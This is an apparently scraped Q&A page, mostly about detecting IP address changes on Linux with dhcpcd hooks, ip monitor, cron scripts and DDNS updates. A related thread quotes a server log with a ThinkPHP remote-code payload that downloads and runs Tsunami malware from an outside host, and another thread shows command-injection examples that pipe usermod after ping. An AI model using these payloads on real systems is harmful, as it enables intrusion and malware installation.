Does anyone know a way to detect a change of IP address in Linux. Say I have dhcpcd running, and it assigns a new IP address, is there a way I can get a notification when it changes? I can't use D-Bus, because this is an embedded ucLinux build that doesn't have it.
inotify on something in /proc/net/ ?
This is an old question, but I will answer for those who will arrive by Google (such as myself). After struggling for a while, I found out that you don't necessarily need to poll or hack a C solution for this. For my case, I wanted to update my home server's (dynamic dns) domain when the IP changes.
If you are running dhcpcd, you are in luck. dhcpcd will run hook scripts when anything happens. See man dhcpcd-run-hooks (online here). Basically you will want to modify or create your own dhcpcd.enter-hook or dhcpcd.exit-hook depending on what you want to do with the data provided by the event.
The command
ip monitor
will show you this kind of thing happening. It uses some the netlink API which is rather tricky and not documented well (at least for humans to understand). However, it is able to get notified by the kernel of various events, such as changes of assigned IPs, routing tables and link status (e.g. someone unplugged the network)
Since DHCP activity is sent to syslogd you could create a named pipe, direct syslog traffic to it and watch the stream for IP address updates. See 'man syslogd' and 'man syslog.conf'.
Edit: Another approach would be to use inotify to monitor the DHCP leases file for the interface. Under Ubuntu 9.10 that is in the /var/lib/dhcp3 directory.
What I thought of was running this script from cron every 10 or so minutes, depending on your link.
If I wrote this right, it only nsupdates when there is an IP change, so no undue load is creater on the zone's master server.
#!/bin/bash
OLD_IP=`cat ip.txt`
NEW_IP=`/sbin/ifconfig | awk -F "[: ]+'{ print $4}'` #adapted from something I got from the internets.
if [ $NEW_IP != OLD_IP ]; then
nsupdate <commands> #it seems like the keys need to be in the same directory from where nsupdate was called
fi
echo $NEW_IP > ip.txt
exit 0 #not sure if this is necessary
Not tested!
This is an older thread but in case someone finds it like I did, I wrote something that does network change detection/notification in Linux awhile back (mostly targeted at helping VPN users), and thanks to some pushy friends I put it up for others to use. It's a pet project now and I'm actively maintaining it, so feature requests and feedback are welcome.
http://code.google.com/p/ipcheck/source/browse/ipcheck.sh
I think you can use dbus to do this on modern Linux distributions. If your distribution uses NetworkManager, see this document for information about its dbus interface:
http://people.redhat.com/dcbw/NetworkManager/NetworkManager%20DBUS%20API.txt
If you have a router running DD-WRT and have the status page in use when going to the router, you can, with a script... wget the status page, cat for the ip address and write it to a file for comparison, have an email send when the latest wget ip address has changed from what is in the comparison file.
I'm running dd-wrt on a linksys wrt54g router and use this script:
It wgets the router status page from 192.168.3.1, uses cat on the page (index.html) and greps for the wan ip address, then writes it to a file (gotip.txt).
A comparison is made between the captured ip (gotip.txt) and the current working ip (workingip.txt). If the ip addresses are different, I get an email sent by send mail of the new ip, and the new working ip is written into the workingip.txt file.
Cron run this every 5 min or so and I have the cron output silenced to /dev/null
#!/bin/bash
getip=$(wget http://192.168.3.1/)
cat index.html | grep "wan_ipaddr" > gotip.txt
gotip=$(cat gotip.txt)
compare=$(cat workingip.txt)
if [[ "$compare" != "$gotip" ]]
then
EMAIL="youremail#foo.net"
EMAILMESSAGE="/home/pi/ipmessage.txt"
echo "ip address is now $gotip" >> $EMAILMESSAGE
/usr/sbin/sendmail -t "$EMAIL" < $EMAILMESSAGE
rm ipmessage.txt
cp gotip.txt workingip.txt
rm index.html
else
echo "done"
rm index.html
fi
Related
Several minutes ago, I ran a python-based server to share a few files with my friend. I disabled the windows firewall so that he could connect and download the files. When someone tries to connect the server, Python shows their IP address and the path they requested.
Someone whom I don't know tried to get my index.php and run wget. I checked their IP address and it seems like they're from Japan. So, how does this person knew my IP address and tried to connect to my computer? I've only shared it with my friend on WhatsApp.
I've done this many times before and this is the first time something like this happens.
61.192.55.32 - - [06/Jan/2019 01:27:16] code 400, message Bad request syntax ("GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://185.255.25.168/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86' HTTP/1.1")
61.192.55.32 - - [06/Jan/2019 01:27:16] "GET /index.php?s=/index/ hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://185.255.25.168/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86' HTTP/1.1" 400 -
There are many people out there running tools like Masscan with custom scripts looking for vulnerable web servers. Most of the time this kind of script are trying to get reverse shells in an attempt to build botnet armies. There are some relates of windows machines connected to internet being hacked before SO finish its installation as well.
This is a pretty common hacking technique. Hackers will scan the internet using seemingly random ip addresses (and happened to pick yours out) and look for open ports (usually common ports like 22, 80 and 443) and run a bunch of common exploits in efforts to gain control over the machine.
Many of the botnet's were created by just attacking random ip addresses hoping that they would have a router with default username and password still set on their router, or with out of date software with known exploits.
In your case it looks like they were hoping that your web server was running a certain combination of PHP software. Your ip address was probably one of thousands that they ran the same query against.
This is why you shouldn't disable your firewall: the average time it takes from going online without protection to someone trying to crack into your system is at best minutes.
Instead, you should find out the IP of your friend, and just allow that single IP. And unless your friend has a static IP address, remove that allow after they're done testing, because someone else could get that address later.
Scenario is this.
I have logged into a web server as admin through the login page in browser.
it has displayed me with an input box that with a button next to it saying "ping"
it essentially will ping an ip address that you input.
I know for a fact the service running on the web server is running as root.
my question is this. can i put in an IP address and then pipe a command after it to elevate my privileges?
For Example...
ping 192.168.0.1 | usermod -a -G <groupname> username
ping 192.168.0.1 | whoami
the command shell running the ping is running under root so in theory it should allow me to elevate a users privileges on the system? please correct me if i'm wrong.
Don't have anything to test on so hence the question.
thanks in advance
This question cannot be answered with a certain "yes" or "no" without seeing the code or being able to explore the system.
It all really depends on the web app. If they're simply concatenating your input onto the end of ping and then execing that command, then yes, what you show is possible.
On the other hand, if they're properly sanitizing inputs (e.g. ensuring the input is only an IP address), or using some other implementation (e.g. a Ping library), then it may not be vulnerable.
In Linux (Ubuntu), I want to programmatically check if there is Internet connection (or if eth0 is connected).
I'm doing this because I am writing a program that requires network connection on a system that is highly prone to lose connection.
So I was thinking maybe a script that I can run periodically to check.
Can you give me good suggestions?
Here is a quick script that will accomplish what you want:
EMAIL=youremail#something.com
ping -c 5 8.8.8.8 >> /dev/null
if [ $? -eq 0 ]
then
echo "Able to reach internet!" | mail $EMAIL
else
echo "Unable to reach internet!" | mail $EMAIL
fi
Obviosly you can change the mail to something else to do depending on what your goal is
EDIT: to explain, this pings googles dns server to ensure you are connected and sends you an email one way or the other. The email part on failure will only work of course if you have a local email server on your network.
/sbin/ifconfig would be an excellent "get adapter status" command to script.
cron would be an excellent way to execute the script.
I also suggest to ping or perhaps wget some distant server (preferably the one you want to connect to). The network could work well on the local campus, but not well on intercontinental connections (e.g. because some cables has been cut).
Is there a way to programmatically add hosts to the local name resolver under Linux?
I would rather avoid fiddling with /etc/hosts dynamically...
Example: add the name foo and bind it to the local port 127.1.2.3
Use Case: I have an application installed locally accessible through a web browser. I'd like the application to be accessible through a local URI.
add the name foo and bind it to the local port 127.0.0.1:9999
What is it that you want? You can add foo 127.0.0.1 to hosts or do the equivalent in your nameserver, but a connection to foo on port 1234 will always go to 127.0.0.1:1234 -- it's not possible to redirect that to port 9999 based on name, which is lost by the time connect is called.
On Linux you can add IPs to the loopback device (i.e. ip addr add 127.1.2.3 dev lo), and then use iptables to change all connections destined for 127.1.2.3:1234 to instead go to 127.0.0.1:9999, but I can't tell from your question if that the observable behavior you want.
If you'll only add hosts, a pretty safe way to do it is
echo -e "ip.add.re.ss\thostname" >> /etc/hosts
Now, if you want to remove them it starts getting hairy. I suspect you also want to remove them.
If this is the case you can use Dynamic DNS, for example, BIND has the nsupdate tool to update zone files:
$ nsupdate
> update delete oldhost.example.com A
> update add newhost.example.com 86400 A 172.16.1.1
> send
This does the following:
Any A records for oldhost.example.com
are deleted. And an A record for
newhost.example.com with IP address
172.16.1.1 is added. The newly-added record has a 1 day TTL (86400
seconds).
The google search term you want is "DDNS" for "Dynamic DNS". That's a technology for dynamically adding records to DNS servers, which sounds like exactly what you want. I'm pretty sure the bind in most lunix distros supports it, but you may need to read up on how to configure it.
I'll be going with a recent discovery: multicast-dns using the Avahi package. An example can be found here.
I have a script which contacts a few sources and tell them "the IP-address XXX.XXX.XXX.XXX is my current one". My test web server has a dynamic IP-address through DHCP and amongst other things it needs to update a DDNS entry when its IP-address changes. However it's not the only thing it does, so I will need to run my own custom script.
I suspect that this is possible by a attaching the script to be run for a given dhclient hook. However I still need to know which hook I should use, and how.
I would recommend to put the script into dhclient-exit-hooks.d. Because you should just change the DDNS entry, if the address change has been finished. However, I am not sure if dhclient-exit-hooks are called, if assigning an address fails.
Edit: The man pages (man dhclient-script) says, that the exit-hooks script will get the exit code in a shell variable (exit_status). So you could check it.